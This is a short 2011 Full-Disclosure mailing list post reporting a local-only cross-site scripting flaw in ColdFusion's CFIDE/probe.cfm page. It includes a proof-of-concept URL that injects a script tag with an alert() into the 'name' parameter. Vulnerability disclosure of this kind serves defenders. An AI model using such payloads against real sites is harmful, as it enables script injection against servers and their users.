[Full-disclosure] ColdFusion Local Parameter Xss Exploit
Rem7ter
rem7ter at gmail.com
Thu Aug 18 10:28:00 BST 2011
*Describe£º*ColdFusion probe.cfm page local parameter can xss
*CVE£º*Unknow
*PoC£º*
http://127.0.0.1/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>
URL.Name parameter can xss only local.
Or visit:
http://www.focusecurity.org/2011/08/ColdFusion-Local-Parameter-Xss-Exploit.html
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110818/40a676d0/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.